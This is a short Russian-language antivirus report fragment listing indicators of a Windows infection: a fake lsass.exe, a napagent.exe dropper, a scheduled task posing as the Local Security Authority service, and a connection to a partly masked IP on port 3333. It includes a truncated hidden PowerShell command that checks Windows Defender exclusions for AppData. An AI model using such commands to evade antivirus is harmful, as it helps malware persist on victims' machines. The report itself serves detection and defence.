Техническая информация
- <SYSTEM32>\tasks\local security authority subsystem service
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -NonInteractive -Command "$path = '%HOMEPATH%\AppData'; $exclusions = Get-MpPreference | Select-Object -ExpandProperty ExclusionPath; if ($exclusions -contains $path) { } el...
- %APPDATA%\microsoft\windows\start menu\programs\system tools\lsass.exe
- %HOMEPATH%\.napagent.json
- %LOCALAPPDATA%\microsoft\windows\napagent.exe
- %APPDATA%\microsoft\windows\start menu\programs\system tools\lsass.exe
- '18#.#30.45.138':3333
- DNS ASK fi#####.###tings.services.mozilla.com
- '%LOCALAPPDATA%\microsoft\windows\napagent.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -NonInteractive -Command "$path = '%HOMEPATH%\AppData'; $exclusions = Get-MpPreference | Select-Object -ExpandProperty ExclusionPath; if ($exclusions -contains $path) { } el... (со скрытым окном)
- '%LOCALAPPDATA%\microsoft\windows\napagent.exe' (со скрытым окном)